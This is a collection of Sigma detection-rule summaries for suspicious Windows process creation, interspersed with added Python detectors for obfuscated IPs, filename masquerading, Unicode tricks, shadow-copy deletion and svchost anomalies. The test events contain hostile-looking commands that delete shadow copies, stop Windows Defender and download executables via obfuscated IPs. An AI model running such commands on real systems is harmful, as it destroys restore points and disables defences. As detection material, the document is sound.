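Worked example, added to this report and not part of the Sigma rules: the double-extension rules earlier in this list and the four 8.3 short-name rules above both defeat literal image-name matching, one by padding the real extension out of sight and the other by renaming the binary. The Python below finds cloaked double extensions (including the runs of spaces or underscores the rule mentions) and 8.3 aliases, and then checks whether an alias can stand for a watched binary by deriving the alias NTFS would generate (first six cleaned characters, "~", a counter, first three characters of the extension). The extension lists and the LOLBIN watch-list are constructed, and the hash-based alias form NTFS switches to after four collisions is not modelled.

```python
"""Filename masquerading checks for process-creation command lines: double
extensions cloaked with spaces/underscores ("report.pdf      .exe") and NTFS
8.3 short names ("C:\\PROGRA~1\\...\\POWERS~1.EXE") that defeat literal
image-name matching. Added example; not from the Sigma rules. The extension
lists and the watch-list are constructed."""
import re

DOC_EXT = r"(?:pdf|docx?|xlsx?|pptx?|txt|rtf|csv|jpe?g|png|gif|mp4|zip|rar|7z|iso|lnk|html?)"
EXE_EXT = r"(?:exe|scr|com|pif|cpl|bat|cmd|js|vbs|ps1|hta|msi)"
# a document extension, an optional cloaking run of spaces/underscores, then an executable extension
DOUBLE_EXT_RE = re.compile(rf"\.{DOC_EXT}[ _]*\.{EXE_EXT}(?=$|[\s\"'])", re.IGNORECASE)

# 8.3 alias: 1-6 name characters, "~", a collision counter, optional 1-3 character extension
SHORT_NAME_RE = re.compile(r"(?<![\w$~])[A-Z0-9_$]{1,6}~\d+(?:\.[A-Z0-9_$]{1,3})?(?=$|[\\\s\"'/])", re.IGNORECASE)

_ILLEGAL_8DOT3 = set(' ."/\\[]:;=,+*?<>|')

# constructed watch-list of binaries whose long names attackers might hide behind an alias
WATCH_LIST = ("powershell.exe", "desktopimgdownldr.exe", "InstallUtil.exe", "rundll32.exe")


def find_double_extensions(cmd):
    return [m.group(0) for m in DOUBLE_EXT_RE.finditer(cmd)]


def find_short_names(cmd):
    return [m.group(0) for m in SHORT_NAME_RE.finditer(cmd)]


def expected_short_form(long_name):
    """(base6, ext3) that NTFS derives for a long name, or None when the name is
    already 8.3-compliant and gets no tilde alias. Spaces and dots are dropped,
    other illegal characters become "_", the result is upper-cased and cut to 6+3."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:
        base, ext = long_name, ""
    compliant = (len(base) <= 8 and len(ext) <= 3
                 and not any(c in _ILLEGAL_8DOT3 for c in base + ext))
    if compliant:
        return None

    def clean(s):
        return "".join("_" if c in _ILLEGAL_8DOT3 else c
                       for c in s.upper() if c not in " .")

    return clean(base)[:6], clean(ext)[:3]


def could_be_short_name_of(short, long_name):
    """True when `short` has the shape NTFS would generate for `long_name`."""
    expected = expected_short_form(long_name)
    if expected is None:
        return False
    m = re.fullmatch(r"([A-Z0-9_$]{1,6})~\d+(?:\.([A-Z0-9_$]{1,3}))?", short.upper())
    return bool(m) and (m.group(1), m.group(2) or "") == expected


def match_watch_list(cmd, watch_list=WATCH_LIST):
    """(short name, long name) pairs for every alias in `cmd` that can stand for
    a watched binary. Compliant names such as rundll32.exe never get an alias."""
    return [(short, long_name)
            for short in find_short_names(cmd)
            for long_name in watch_list
            if could_be_short_name_of(short, long_name)]


if __name__ == "__main__":
    print(find_double_extensions('"C:\\Users\\bob\\Downloads\\invoice.pdf      .exe"'))
    print(match_watch_list("C:\\WINDOWS\\SYSTEM32\\WINDOW~1\\v1.0\\POWERS~1.EXE -nop -w hidden"))
```

The collision counter is deliberately not checked: whether PowerShell's directory is WINDOW~1 or WINDOW~2 depends on creation order on that host, so only the six-character stem and the extension are compared. Where Sysmon or EDR telemetry already provides a normalised Image field, match on that and treat a tilde only in CommandLine as the signal.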
Obfuscated IP Download Activity Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in a URL combined with a download command https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608, https://twitter.com/fr0s7_/status/1712780207105404948
Obfuscated IP Via CLI Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
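Worked example, added to this report and not part of the two Sigma rules above or their references: the rules flag hex and octal spellings, but inet_addr()-style parsers in curl, certutil, browsers and Windows itself also accept a single 32-bit decimal ("2130706433") and fewer than four parts ("127.1", "0x7f.1"), where a missing part widens the last one. The Python below normalises every such spelling back to dotted-quad form, so a hunt for a known C2 address also matches its disguised forms, and reports only tokens that were not already plain dotted quads. The command lines it runs on are constructed.

```python
"""Normalise obfuscated IPv4 spellings (hex, octal, decimal dword, fewer than
four parts) that inet_addr()-style parsers accept, so command lines flagged by
the obfuscated-IP rules can be matched against a plain address list.
Added example; not from the Sigma rules. The command lines are constructed."""
import re

# one inet_addr() part: hex (0x..), octal (leading 0) or decimal
_PART = r"(?:0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)"
# one to four parts separated by dots, not glued to other word characters
_TOKEN_RE = re.compile(rf"(?<![\w.])((?:{_PART}\.){{0,3}}{_PART})(?![\w.])", re.IGNORECASE)
_PLAIN_QUAD_RE = re.compile(r"(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)")

# bit width of each part: a missing part widens the last one (127.1 == 127.0.0.1)
_WIDTHS = {1: (32,), 2: (8, 24), 3: (8, 8, 16), 4: (8, 8, 8, 8)}


def _part_value(text):
    t = text.lower()
    if t.startswith("0x"):
        return int(t[2:], 16)
    if len(t) > 1 and t[0] == "0":
        return int(t, 8)
    return int(t)


def normalize_ipv4(token):
    """Dotted quad for any inet_addr()-style spelling, or None if `token` is not one."""
    parts = token.split(".")
    widths = _WIDTHS.get(len(parts))
    if widths is None:
        return None
    try:
        values = [_part_value(p) for p in parts]
    except ValueError:
        return None
    total = 0
    for value, width in zip(values, widths):
        if value >= 1 << width:       # part does not fit its field: not an address
            return None
        total = (total << width) | value
    return ".".join(str((total >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_ips(command_line):
    """[(raw token, normalised address)] for every IPv4 spelling in the command
    line that is not already a plain four-part decimal dotted quad."""
    hits = []
    for m in _TOKEN_RE.finditer(command_line):
        raw = m.group(1)
        if "." not in raw and len(raw) < 8:   # short bare numbers: ports, flags, counters
            continue
        ip = normalize_ipv4(raw)
        if ip is not None and not _PLAIN_QUAD_RE.fullmatch(raw):
            hits.append((raw, ip))
    return hits


if __name__ == "__main__":
    for cmd in ("curl http://0x7f000001/a.exe -o a.exe",
                "powershell iwr http://0177.0.0.1:8080/x",
                "ping 2130706433",
                "certutil -urlcache -f http://192.168.1.10/x x"):
        print(cmd, "->", find_obfuscated_ips(cmd))
```

Three-part tokens such as build numbers ("10.0.19041") are valid inet_addr() input and will be reported, so in a production rule either require a URL or UNC context in front of the token or drop the three-part form; the two-part, single-dword, hex and octal spellings are rarely legitimate in a process command line.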
Suspicious Process Parents Detects suspicious parent processes that should not have any children or should only have a single possible child program https://twitter.com/x86matthew/status/1505476263464607744?s=12, https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b
Private Keys Reconnaissance Via CommandLine Tools Adversaries may search for private key certificate files on compromised systems for insecurely stored credential https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md
Potential PowerShell Execution Via DLL Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine. https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md
Suspicious RunAs-Like Flag Combination Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html
Privilege Escalation via Named Pipe Impersonation Detects the command-line pattern used for named pipe impersonation (e.g. Meterpreter's "getsystem"), in which a service-launched "cmd.exe /c echo ... > \\.\pipe\..." connects to an attacker-created pipe so that the pipe server can impersonate the SYSTEM client. https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html
Windows Processes Suspicious Parent Directory Detect suspicious parent processes of well-known Windows processes https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2, https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/, https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf
Suspicious Program Names Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Recon Information for Export with Command Prompt Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Suspicious Process Execution From Fake Recycle.Bin Folder Detects process execution from a fake recycle bin folder, often used to evade security solutions. https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
Suspicious Redirection to Local Admin Share Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Potential Remote Desktop Tunneling Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
Potential Defense Evasion Via Right-to-Left Override Detects the presence of the U+202E (RIGHT-TO-LEFT OVERRIDE) character, which causes a terminal, browser, or operating system to render the text that follows it in right-to-left order. This is used as an obfuscation and masquerading technique. https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method, https://unicode-explorer.com/c/202E
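Worked example, added to this report and not part of the Sigma rules: the right-to-left override rule above, the homoglyph rule, the unicode-obfuscation rule and the four emoji rules in this list all detect the same thing at different code points, namely characters that change what an analyst or a keyword match sees without changing what the shell executes. The Python below walks a command line once, reports bidi and zero-width controls, lookalike letters and emoji by position, returns a folded copy on which ordinary keyword matching works again, and shows how a bidi-aware UI renders an RTLO filename. The homoglyph table is a constructed subset of the "perfect" lookalikes the rule describes, and the emoji code-point ranges are an assumption about what those rules match.

```python
"""Character-level obfuscation checks for command lines: bidi overrides such
as U+202E (RTLO), zero-width characters, lookalike (homoglyph) letters and
emoji. Added example; not from the Sigma rules. The homoglyph table is a
constructed subset and the emoji ranges are an assumption."""

RTLO = "\u202e"

# bidi embedding/override/isolate controls and zero-width characters: none belongs in a command line
HIDDEN_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",   # LRE RLE PDF LRO RLO
    "\u2066", "\u2067", "\u2068", "\u2069",             # LRI RLI FSI PDI
    "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff",   # ZWSP ZWNJ ZWJ WJ BOM
}

# Cyrillic and Greek letters that render identically to ASCII letters (NFKC does not fold these)
PERFECT_HOMOGLYPHS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0443": "y", "\u0445": "x",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M", "\u041d": "H",
    "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T", "\u0425": "X",
    "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0397": "H", "\u0399": "I", "\u039a": "K",
    "\u039c": "M", "\u039d": "N", "\u039f": "O", "\u03a1": "P", "\u03a4": "T", "\u03a7": "X", "\u03bf": "o",
}


def is_emoji(ch):
    """Assumed emoji ranges: Misc Symbols/Dingbats and the SMP pictograph blocks."""
    cp = ord(ch)
    return 0x2600 <= cp <= 0x27BF or 0x1F300 <= cp <= 0x1FAFF


def analyse_command_line(cmd):
    """Flag hidden controls, homoglyphs and emoji by position, and return the
    command line with controls removed and homoglyphs folded to ASCII so that
    ordinary keyword matching (e.g. "powershell") works on it again."""
    findings = {"controls": [], "homoglyphs": [], "emoji": []}
    folded = []
    for pos, ch in enumerate(cmd):
        if ch in HIDDEN_CONTROLS:
            findings["controls"].append((pos, f"U+{ord(ch):04X}"))
            continue                      # dropped from the folded text
        if ch in PERFECT_HOMOGLYPHS:
            findings["homoglyphs"].append((pos, ch, PERFECT_HOMOGLYPHS[ch]))
            folded.append(PERFECT_HOMOGLYPHS[ch])
            continue
        if is_emoji(ch):
            findings["emoji"].append((pos, f"U+{ord(ch):04X}"))
        folded.append(ch)
    findings["folded"] = "".join(folded)
    return findings


def rtlo_display_name(name):
    """What a bidi-aware UI shows for a name containing RLO: every character
    after the override is forced right-to-left, so the visible text is reversed."""
    head, sep, tail = name.partition(RTLO)
    return head + tail[::-1] if sep else name


if __name__ == "__main__":
    # constructed samples: an RTLO-disguised executable and a Cyrillic "о" inside powershell
    for cmd in ("cmd.exe /c invoice_\u202efdp.exe", "p\u043ewershell.exe -nop -w hidden"):
        print(analyse_command_line(cmd))
    print(rtlo_display_name("invoice_\u202efdp.exe"))   # shown to the user as invoice_exe.pdf
```

The folded text is what a detection pipeline should match on: "p\u043ewershell.exe" never contains the substring "powershell", so a rule keyed on the image name misses it until the lookalike is folded, while the positional findings are what goes into the alert.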
Script Interpreter Execution From Suspicious Folder | Detects suspicious script interpreter execution from temporary folders or folders reachable via environment variables. | https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military, https://learn.microsoft.com/en-us/windows/win32/shell/csidl
Suspicious Script Execution From Temp Folder | Detects suspicious script execution from a temporary folder. | https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Sensitive File Access Via Volume Shadow Copy Backup | Detects a command that accesses a Volume Shadow Copy in order to extract sensitive files such as the SECURITY or SAM registry hives or the AD database (ntds.dit). | https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
Suspicious New Service Creation | Detects creation of a new service via the "sc" command or the PowerShell "New-Service" cmdlet with suspicious binary paths. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Suspicious Service Binary Directory | Detects a service binary running from a suspicious directory. | https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
Shadow Copies Creation Using Operating Systems Utilities | Detects shadow copy creation using operating system utilities, a possible precursor to credential access (copying the SAM hive or ntds.dit out of the snapshot). | https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/
Suspicious Windows Service Tampering | Detects the usage of binaries such as "net", "sc" or "powershell" to stop, pause, disable or delete critical or important Windows services such as AV, backup, etc., as seen in some ransomware scripts. | https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg, https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
System File Execution Location Anomaly | Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. | https://twitter.com/GelosSnake/status/934900723426439170, https://asec.ahnlab.com/en/39828/
Shadow Copies Deletion Using Operating Systems Utilities | Detects shadow copy deletion using operating system utilities, a common ransomware precursor that destroys local restore points. | https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://blog.talosintelligence.com/2017/05/wannacry.html, https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100, https://github.com/Neo23x0/Raccine#the-process, https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar, https://redcanary.com/blog/intelligence-insights-october-2021/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
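The shadow-copy deletion and service-tampering rules above share one shape: several "field contains any of these strings" selections that must all hold. The following is an added example, not from the page or the Sigma rule files: a minimal matcher of that shape in Python, run over constructed process-creation events. The rule bodies, the list of targeted service names and the events are my own illustration of the rules' structure, not their exact contents.

```python
"""Added example (not from the page or the Sigma rule files): the shadow-copy
deletion and service-tampering patterns above, expressed as a small
Sigma-style "field contains any of" matcher and run over constructed
process-creation events. Rule bodies, the service-name list and the events
are my own illustration of the rules' shape, not their exact contents."""
from __future__ import annotations

# A rule is a list of selections that must ALL hold. A selection
# (field, substrings) holds when the field contains ANY of the substrings,
# compared case-insensitively as Sigma does by default.
RULES: dict[str, list[tuple[str, list[str]]]] = {
    "Shadow Copies Deletion Using Operating Systems Utilities": [
        ("CommandLine", ["vssadmin", "wmic", "diskshadow", "wbadmin"]),
        ("CommandLine", ["shadow", "catalog"]),
        ("CommandLine", ["delete", "resize"]),
    ],
    "Suspicious Windows Service Tampering": [
        ("Image", ["\\net.exe", "\\net1.exe", "\\sc.exe", "\\powershell.exe"]),
        ("CommandLine", [" stop ", " delete ", " config ", " pause ",
                         "start= disabled", "stop-service", "set-service"]),
        # Security and backup services attackers go after (assumed list).
        ("CommandLine", ["windefend", "sense", "msmpsvc", "mbamservice",
                         "sepmasterservice", "vss", "wbengine", "sqlwriter"]),
    ],
}


def _contains_any(event: dict, field: str, needles: list[str]) -> bool:
    haystack = str(event.get(field, "")).lower()
    return any(needle.lower() in haystack for needle in needles)


def matching_rules(event: dict) -> list[str]:
    """Titles of every rule whose selections all hold for this event."""
    return [title for title, selections in RULES.items()
            if all(_contains_any(event, field, values) for field, values in selections)]


# Constructed Sysmon EID 1 / Security 4688 style events, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net stop WinDefend"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc config WinDefend start= disabled"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},      # benign: enumeration only
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net stop Spooler"},           # benign: not a security service
]


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map each command line to the rule titles it triggers (empty = clean)."""
    return {event["CommandLine"]: matching_rules(event) for event in events}


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(f"{cmdline!r:50} -> {hits or 'clean'}")
```

The two benign events show why each rule needs more than one selection: `vssadmin list shadows` and `net stop Spooler` each satisfy two of three conditions and would be noisy false positives on a single-keyword rule.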
Windows Shell/Scripting Processes Spawning Suspicious Programs | Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc. | https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Suspicious SYSTEM User Process Creation | Detects a suspicious process creation as the SYSTEM user (suspicious program or command-line parameter). | Internal Research, https://tools.thehacker.recipes/mimikatz/modules
Suspicious SYSVOL Domain Group Policy Access | Detects access to domain Group Policy objects stored in SYSVOL. | https://adsecurity.org/?p=2288, https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
Tasks Folder Evasion | The Tasks folders under System32 and SysWOW64 are globally writable paths. Adversaries can take advantage of this to make script hosts or any .NET application running from Tasks load and execute a custom assembly into cscript, wscript, regsvr32, mshta or eventvwr. | https://twitter.com/subTee/status/1216465628946563073, https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26
Process Creation Using Sysnative Folder | Detects process creation events that use the Sysnative folder (common for Cobalt Strike spawns). | https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
Suspicious Userinit Child Process | Detects a suspicious child process of userinit. | https://twitter.com/SBousseaden/status/1139811587760562176
Malicious Windows Script Components File Execution by TAEF Detection | The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM scripting interfaces). Adversaries may execute malicious code (such as a WSC file with VBScript, a DLL and so on) directly by running te.exe. | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/, https://twitter.com/pabraeken/status/993298228840992768, https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/
Malicious PE Execution by Microsoft Visual Studio Debugger | The Visual Studio Just-In-Time Debugger "vsjitdebugger.exe" has an option to launch a specified executable and attach a debugger. Adversaries may use this option to execute malicious code via a signed, trusted binary. The debugger is installed alongside the Microsoft Visual Studio package. | https://twitter.com/pabraeken/status/990758590020452353, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/, https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019
Weak or Abused Passwords In CLI | Detects weak or often abused passwords (seen used by threat actors) passed via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline. | https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments, https://thedfirreport.com/2022/09/26/bumblebee-round-two/, https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Usage Of Web Request Commands And Cmdlets | Detects the use of various web request commands with command-line tools and Windows PowerShell cmdlets (including aliases) via CommandLine. | https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell, https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
WhoAmI as Parameter | Detects a suspicious process command line that uses whoami as the first parameter (as used e.g. by EfsPotato). | https://twitter.com/blackarrowsec/status/1463805700602224645?s=12
Execution via WorkFolders.exe | Detects use of WorkFolders.exe to execute an arbitrary control.exe. | https://twitter.com/elliotkillick/status/1449812843772227588
Suspect Svchost Activity | It is extremely abnormal for svchost.exe to spawn without any command-line arguments; this is normally observed when a malicious process spawns it and injects code into its memory space. | https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
Suspicious Process Masquerading As SvcHost.EXE | Detects a suspicious process masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. | https://tria.ge/240731-jh4crsycnb/behavioral2, https://redcanary.com/blog/threat-detection/process-masquerading/
Terminal Service Process Spawn | Detects a process spawned by the terminal service server process (this could be an indicator of exploitation of CVE-2019-0708). | https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/
Uncommon Svchost Parent Process | Detects an uncommon svchost parent process. | Internal Research
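The svchost and system-binary location rules above (System File Execution Location Anomaly, Process Creation Using Sysnative Folder, Suspect Svchost Activity, Suspicious Process Masquerading As SvcHost.EXE, Uncommon Svchost Parent Process) all reduce to path normalisation plus a few relational checks. The following is an added example, not code from the page or from the Sigma project: the binary list, the allowed directories, the svchost parent allow list and the events are my own choices for the demo and should be replaced by a baseline from your own telemetry.

```python
"""Added example (not from the page): the "known system binary from an
unusual location" check shared by the System File Execution Location Anomaly,
Sysnative and svchost rules above, plus the two svchost sanity checks (no
service-group arguments, uncommon parent). The binary list, allowed
directories, parent allow list and events are my own choices for the demo."""
from __future__ import annotations

import ntpath

SYSTEM_BINARIES = {
    "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe",
    "smss.exe", "wininit.exe", "spoolsv.exe", "taskhostw.exe", "dllhost.exe",
}
ALLOWED_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
WINSXS_PREFIX = "c:\\windows\\winsxs\\"
# Parents that legitimately start svchost.exe (assumed; extend from your baseline).
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe"}


def classify(image: str) -> str:
    """'sysnative' | 'not_system_binary' | 'expected' | 'anomalous' for an image path."""
    directory, name = ntpath.split(image.replace("/", "\\").lower())
    # Sysnative is the 32-bit view of System32: legitimate, but rare enough in
    # normal telemetry (see the Cobalt Strike guide above) to be worth flagging.
    if directory == "c:\\windows\\sysnative":
        return "sysnative"
    if name not in SYSTEM_BINARIES:
        return "not_system_binary"
    if directory in ALLOWED_DIRS or directory.startswith(WINSXS_PREFIX):
        return "expected"
    return "anomalous"


def assess(event: dict) -> list[str]:
    """Findings for one process-creation event (Sysmon EID 1 field names)."""
    findings = []
    image = event.get("Image", "")
    verdict = classify(image)
    if verdict == "anomalous":
        findings.append("system binary executed from uncommon location")
    elif verdict == "sysnative":
        findings.append("process created via Sysnative folder")
    if ntpath.basename(image).lower() == "svchost.exe":
        cmd = " " + event.get("CommandLine", "").lower() + " "
        if " -k " not in cmd:   # a genuine svchost always names its service group
            findings.append("svchost.exe started without service group arguments")
        parent = ntpath.basename(event.get("ParentImage", "")).lower()
        if parent not in EXPECTED_SVCHOST_PARENTS:
            findings.append(f"uncommon svchost parent: {parent or 'unknown'}")
    return findings


# Constructed events, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "CommandLine": "svchost.exe",
     "ParentImage": r"C:\Users\bob\Downloads\update.exe"},
    {"Image": r"C:\Windows\Sysnative\rundll32.exe",
     "CommandLine": "rundll32.exe",
     "ParentImage": r"C:\Windows\Temp\beacon.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["Image"], "->", assess(event) or "clean")
```

Note that the last sample is the injection case from Suspect Svchost Activity: the image path is perfectly legitimate, so only the missing `-k` group and the odd parent give it away. A location-only check would miss it.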
Permission Check Via Accesschk.EXE | Detects usage of the "Accesschk" utility, an access and privilege audit tool developed by Sysinternals and often abused by attackers to check process privileges. | https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43, https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW, https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat
Active Directory Database Snapshot Via ADExplorer | Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database. | https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Suspicious Active Directory Database Snapshot Via ADExplorer | Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database to a suspicious directory. | https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Potential Execution of Sysinternals Tools | Detects command lines that contain the "accepteula" flag, which could be a sign of execution of one of the Sysinternals tools. | https://twitter.com/Moti_B/status/1008587936735035392
Potential Memory Dumping Activity Via LiveKD | Detects execution of LiveKD based on PE metadata or image name. | https://learn.microsoft.com/en-us/sysinternals/downloads/livekd
Kernel Memory Dump Via LiveKD | Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory. | https://learn.microsoft.com/en-us/sysinternals/downloads/livekd, https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/, https://kb.acronis.com/content/60892
Procdump Execution | Detects usage of the Sysinternals Procdump utility. | https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Potential SysInternals ProcDump Evasion | Detects uses of the Sysinternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name. | https://twitter.com/mrd0x/status/1480785527901204481
Potential LSASS Process Dump Via Procdump | Detects suspicious uses of the Sysinternals Procdump utility by matching a special command-line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable. | https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
